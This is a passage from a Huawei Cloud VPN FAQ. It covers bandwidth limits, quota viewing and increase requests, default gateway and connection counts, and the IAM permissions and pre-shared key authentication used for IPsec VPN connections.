● The VPN connection bandwidth refers to the bandwidth in the outbound direction.

Bandwidth Size

● The default maximum bandwidth of a Direct Connect connection is 1,000 Mbit/s. When you create a connection on the management console and set Port Type to 10GE single-mode optical port, the maximum bandwidth is 10 Gbit/s.
● The maximum bandwidth of a VPN connection is 300 Mbit/s.

Network Quality

● A Direct Connect user has a dedicated connection with high network quality.
● VPN connections share the bandwidth of their VPN gateway. The total bandwidth of VPN connections cannot exceed the bandwidth of their gateway. The network quality is affected by the Internet quality.

14.8 How Do I Determine My VPN Bandwidth Size?

Consider the following when you determine the bandwidth:

● The amount of data transmitted over a VPN tunnel in a period of time (reserve enough bandwidth to prevent link congestion).
● The egress bandwidth at the cloud end of the VPN connection must be less than that at the off-cloud end of the VPN connection.


15 Quotas

15.1 What Is the VPN Quota?

What Is Quota?

Quotas limit the number or amount of resources available to users, such as the maximum number of ECSs or EVS disks that can be created.

If the existing resource quota cannot meet your service requirements, you can apply for a higher quota.

How Do I View My Quotas?

1. Log in to the management console.
2. Click in the upper left corner and select the desired region and project.
3. In the upper right corner of the page, choose Resources > My Quotas.
   The Service Quota page is displayed.

Figure 15-1 My Quotas

4. View the used and total quota of each type of resource on the displayed page.
   If a quota cannot meet service requirements, apply for a higher quota.


How Do I Apply for a Higher Quota?

1. Log in to the management console.
2. In the upper right corner of the page, choose Resources > My Quotas.
   The Service Quota page is displayed.

Figure 15-2 My Quotas

3. Click Increase Quota.
4. On the Create Service Ticket page, configure parameters as required.
   In the Problem Description area, fill in the content and reason for the adjustment.
5. After all necessary parameters are configured, select I have read and agree to the Tenant Authorization Letter and Privacy Statement and click Submit.

15.2 How Many VPN Gateways and VPN Connections Can I Create By Default?

By default, each user can create two VPN gateways and 12 VPN connections. Before purchasing VPN gateways, check your remaining quota. If the quota has been reached, submit a service ticket to request a quota increase.

15.3 How Do I Change My VPN Gateway and Connection Quotas?

1. Log in to the management console. In the upper right corner of the page, choose Service Tickets > Create Service Ticket.
2. On the Create Service Ticket page, click Quotas in the Services area.
3. Choose Quota Application under Select Subtype.
4. Click Create Service Ticket.
   Enter the required information and click Submit.


15.4 How Many IPsec VPNs Can I Have?

By default, a user can have a maximum of five IPsec VPNs. If the quota cannot fulfill your service requirements, request a quota increase.


16 Account Permissions

16.1 Are a Username and Password Required for Creating an IPsec VPN Connection?

No. HUAWEI CLOUD IPsec VPN uses a pre-shared key (PSK) for authentication. The key is configured on a VPN gateway. A tunnel is established after VPN negotiation is complete. Therefore, usernames and passwords are not required.

Generally, SSL, PPTP, and L2TP VPNs use usernames and passwords for authentication.

NOTE

IPsec XAUTH is an extension of IPsec VPN. It prompts users to enter their usernames and passwords during VPN negotiation. HUAWEI CLOUD VPN does not support IPsec XAUTH.

16.2 What Should I Do If the System Displays a Message Indicating That I Do Not Have the Permissions to Create a VPN?

Check whether your account is an IAM user account. If yes, have the HUAWEI CLOUD account user grant you the VPC operation permissions on the IAM console. Ensure that your account has the VPC Administrator, Tenant Guest, and VPN Administrator permissions.

16.3 How Do I Determine that My Account Cannot Create a VPN Due to Insufficient Permissions?

● The VPN gateways and connections created by the HUAWEI CLOUD account are invisible to the IAM user accounts.

● A message indicating that the system is busy is displayed when you create a VPN gateway or connection using an IAM user account.

For details about the permissions required for creating a VPN connection, see What Should I Do If the System Displays a Message Indicating That I Do Not Have the Permissions to Create a VPN?
